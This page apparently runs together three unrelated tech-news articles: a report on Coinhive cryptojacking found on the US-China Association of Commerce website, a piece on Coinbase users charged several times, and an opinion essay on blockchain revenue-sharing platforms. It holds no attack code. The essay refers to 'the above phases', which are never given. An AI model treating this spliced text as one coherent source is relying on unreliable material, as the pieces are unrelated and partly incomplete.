The US-China Association of Commerce site is running cryptocurrency mining malware

The crypto-jacking malware epidemic is far from over – and it appears the latest victim of this disturbing trend is the website of the US-China Association of Commerce (USCAC).

Security researcher Troy Mursch from Bad Packets Report has found that the USCAC website is infected with a malicious script designed to steal visitors’ computing power to surreptitiously mine cryptocurrency.

For the record, the malicious script found on the USCAC is more commonly known as Coinhive . This means that whoever sneaked in the script is currently banking on the popular anonymous cryptocurrency Monero.

For safety reasons, we have decided not to link directly to the affected website, as Mursch warns that the page could direct users to “fake tech support scams and other malware downloads.”

The reason for this breach likely is the fact that the USCAC site runs on an outdated version of the Drupal content management system (CMS). Indeed, Mursch emphasizes the USCAC source code indicates the last time the website got an update was back in December 2011.

For context, USCAC describes itself as a “community of entrepreneurs and professionals” with 300 Western and Chinese members and thousands of business organizations. Its goal is to “enhance friendship and understanding” between the American and the Chinese governments.

“Websites that use outdated versions of Drupal (CMS) are highly vulnerable and can be exploited en mass.” Mursch told Hard Fork. “Unfortunately I’ve found 115,000 Drupal sites that are at outdated — some haven’t been updated in many years. So far, we’ve found hundreds of these sites affected by crypto-jacking attacks.”

Indeed, this is not the first government website to be featuring the cryptocurrency mining malware.

Earlier this year, Mursch revealed a list of 400 compromised websites that were similarly running outdated Drupal versions. The list of affected pages included government sites of countries like the US, Mexico, Turkey, Peru, South Africa, and Italy; other notable examples included the sites of Chinese giant Lenovo, Taiwanese hardware maker D-Link, and the University of California, Los Angeles (UCLA).

It is particularly worrying that well-funded institutions like the ones above have failed to adequately update their websites and protect their users against such attacks. But Troy hints that Coinhive might also be partially responsible for the recent outbreak of crypto-jacking malware.

Mursch told Hard Fork that prior to a report he and fellow researcher Brian Krebs published in March, Coinhive used to “let abuse run rampant” on its platform. “They still do, but at least now they can cut a key off,” he added. Disabling a key essentially means no more mining for the Monero user who owns the key. However, Mursch notes that malicious actors can easily request and get a new key – which could turn the affair in a vicious circle.

Mursch told Hard Fork that he has not yet reported the issue to USCAC, pointing out that it is unfeasible for him to contact the operators of all 115,000 affected websites. Instead, he has been collaborating with the Drupal security team and the US Computer Emergency Response Team (CERT) to spread the word.

Mursch’s advise is for all website operators using Drupal’s content platform to update to the latest available version as soon as possible.

While Mursch remains concerned the crypto-jacking epidemic is here to stay, he advises there are some measures you can take to protect yourself: you can find out more about this here .

Coinbase tells overcharged cryptocurrency buyers to contact their banks

It has been more than 10 days since numerous Coinbase users cried out the popular cryptocurrency exchange desk has erroneously charged them multiple times for past purchases, but it seems the situation is far from over – and customers are still waiting on refunds from Visa and their banks.

Over the weekend, a group of cryptocurrency holders took to Reddit to complain they are yet to be compensated for purchases they never made – some for as much as 50 times the value of the intended purchase .

“Still have not received refund on [C]oinbase triple charge,” one user wrote on February 25. The poster went on to explain that after being refunded for a wrong purchase that occurred on February 1, the customer was again wrongly charged on February 14. Unfortunately, he has yet to receive a refund for the second mishap.

What is especially concerning is that this is hardly the only complaint .

To this date, it remains unclear who is responsible for this massive blunder – or what precisely caused it. And from the looks of it, things are likely to stay this way .

Shortly after confirming the issue on February 15, Coinbase blamed the multiple charges on Visa. While the financial service giant initially denied any fault, essentially shifting the responsibility back to Coinbase, it eventually released another statement to make it clear that the exchange desk made no mistake.

“This issue was not caused by Coinbase,” the company wrote in a joint-statement with payment processing service Worldpay. “Worldpay and Coinbase have been working with Visa and Visa issuing banks to ensure that the duplicate transactions have been reversed and appropriate credits have been posted to cardholder accounts.”

We asked Coinbase to clarify which banks are yet to handle unprocessed refunds, but the exchange desk was unfortunately unable to provide this information. However, according to a statement the company posted on Reddit on February 22, Scotiabank is one of these institutions.

“We are investigating a potential issue for Scotia Bank [sic] customers leading to incorrect charges,” a company spokesperson said. “We believe this to be isolated at this point, and separate from the Worldpay and Visa issue outlined above. We will post an update here as we learn more.”

Browsing through complaints on Reddit, it appears that customers of the Singapore-based United Overseas Bank are facing the same issue.

On the bright side, there is a growing selection of users reporting that their banks have successfully reversed the erroneous transfers. US-based Landmark Credit Union Bank has purportedly already begun issuing refunds, according to commenters .

One slightly annoying detail is that wrongly charged users appear to have incurred additional fees for the multiple charges. Speaking to Coinbase over the phone, the exchange desk vehemently insisted that banks are responsible for any unexpected fees resulting from wrongful charging. There is no mention if overdraft fees incurred due to this inconvenience will be refunded – or who is responsible for such expenses.

A spokesperson for Coinbase further told TNW that any impacted users still waiting to receive refunds ought to get in touch with their customer support team, so they can give them further directions on how they can contact their banks and claim their cash back.

In the meantime, we would like to encourage affected users (who are yet to receive refunds) to contact us with details about their card-issuing banks. We are trying to compile a list of banks that are yet to reverse the inaccurate charges. Please get in touch at [email protected]

Even though blockchain and cryptocurrency might not be perfect yet, we’re exploring the possibilities at TNW Conference 2018. Find more info here .

Blockchain can lead to less greedy companies — seriously

A new wave of companies is coming which will view the sharing of revenue with their users as natural part of doing business. This vision is fixed in code, written down in smart contracts on a blockchain protocol. These contracts automatically secure and execute the vision, and the operation of the company. I believe that in due time, these companies could sprout new economic models, empowered by its tech and a vision for a more fairer world.

Although the dominant platforms Facebook, Youtube, Google, and Instagram keep increasing in size, a clear negative shift in sentiment is unfolding towards them. Rightly fueled by scandals and new expectations.

The way I see it, if consumers want change — and companies with the right vision and the right technology tap into this — we could be seeing a new wave of companies having success with a more open and fairer model.

Uneven distribution of wealth and the changing zeitgeist

Currently large tech platforms like Facebook, Youtube, Google, and Instagram take the lion’s share from the market when it comes to revenue generated from advertising, search, and content. Most of the users from these services, receive little to no value in return for their addition. You could say content in return for likes, views, and dopamine hits.

Based on estimates , Youtube generated $12 billion in revenue in 2016. Only the really large Youtube stars get a tiny fraction of this amount. Recently Youtube raised the limit for the amount of views you need before you get to share in the advertising revenue. One can’t help but to wonder if this is an honest model.

Besides an unbalanced reward system, I also see a seismic shift happening in the sentiment people have towards the big tech platforms. They are experiencing a push-back from governments . Multiple former Facebook executives have publicly stated that they created a tool that is “ripping apart the social fabric of how society works.”

Recently the #DeleteFacebook became trending after several call-outs of influential people. This does not have a immediate effect on the companies, but will change the public’s perception of the companies. Which in return creates room for new companies with a different mindset.

Besides, there is a growing demand from consumers, especially millennials, who would like large corporates to contribute to society. 91 percent of millennials would even switch brands for those who are associated with a good cause. This sounds like music to my ears. Could this also mean that there is room for companies who do good for their own users as well? Is it finally time for new models?

New platforms and new models

First steps have been taken by several new video platforms like Flixxo and View.ly to try out new models. I’m not here to endorse them or to tell you that they’re the absolute right way to go — but what they have done is they’ve shown a possible way from the greed of current tech giants. They reward users tokens for watching, sharing, or uploading content. You are being payed to use and participate in the platform.

Flixxo goes even further by leveraging their users bandwidth for the distribution of the video content by means of BitTorrent technology. Which you get paid for of course.

Advertisers can buy tokens directly from specific channels they want to advertise on. Users who have no tokens can consume content by watching these ads.

Smart contracts for an automated distribution of wealth

As a contributor to the service you can decide how many tokens you want to earn for your content. All of this is automatically handled by smart contracts. Thanks to this setup, it’s even possible to decide how to split revenue between your production partners — after checking for copyright issues, the network validates the payout within 7 days.

No intermediary party is needed anymore. The rules in the smart contract operate the company, after agreement these rules are no longer adjustable. This automates the operation of the company and reduces costs. Leaving more to share with the users.

It’s imaginable that people would prefer a platform where they get paid for their attribution. The idea that blockchain and smart contracts can facilitate a new generation of companies is completely feasible, technically it’s already possible.

That this can create new economic models is besides a beautiful thought, maybe also something that can become a reality. To investigate and validate, if I was not alone in this thinking.

I was fortunate enough to have chat about this with Joseph Lubin , the co-founder of the second largest cryptocurrency and largest smart contract platform Ethereum. During a roundtable discussion at SXSW, he shared my views of new companies arising which are wired differently from the ground up where sharing is in their core.

Will this really work?

Companies like Flixxo and View.ly are currently in an alpha phase and still have to prove themselves. If you look at a platform like Steemit you can see the first signs of new models starting to work. Users pay each other for posting, sharing, and commenting on its message board. Payments are done through their own token model the Steem dollar. Steemit has already been running for several years and is gaining in size.

The challenges of companies like Flixxo and View.ly could lie in the fact that they use ERC20 style tokens. They currently take around 10 minutes to transfer and consume some gas for the transaction. Millions of transactions could clog the system, like what happened with Cryptokitties .

To counter this, Flixxo is starting out with combining centralized and distributed methods for the usage of tokens. In the beginning blockchain will only be used for deposits and withdrawals of tokens. As blockchain becomes more scalable and the technology improves, the entire process can be moved to the blockchain. They are working with RSK to set up such technology.

In the case of View.ly publishers need tokens to publish and token holders can vote on quality content similar to Steemit. Votes will be broadcasted on a p2p network through the Whisper protocol, so everybody can validate them — this is all off chain communication. At the end of a distribution period, which is currently seven days, votes are aggregated and tokens are issued as rewards for participation, this is done on-chain.

When speaking to the developers it seems to be an ongoing process of improvement while at the same time, many smart developers are working on improving the Ethereum blockchain through sharding and state channels.

For these new companies it’s of course really difficult to win from the large platforms. Due to their lack of scale and lack of money. But the current platforms are built on different business models based most of the time on advertising revenue. For them it’s difficult to switch to new more open business models.

If fairer models will become a reality, when can we expect these?

You do have to be patient. If you look at the above phases you can envision a time-frame. Currently we are only in phase 3, where companies try to build somewhat usable consumer facing wallets where people can store their digital currencies. But it’s still early days.

However, the technology, the vision, the companies, and the timing seem to be getting more and more aligned for companies to run an open and transparent system where they share with their users. If I’d have to make an estimation, maybe this new wave of tech and corresponding companies will be common in the next 5-10 years.

It’s also up to us. The ones building, envisioning, and pushing technology forward. Let’s try to use technology to empower visions for a better world instead of just more greedy.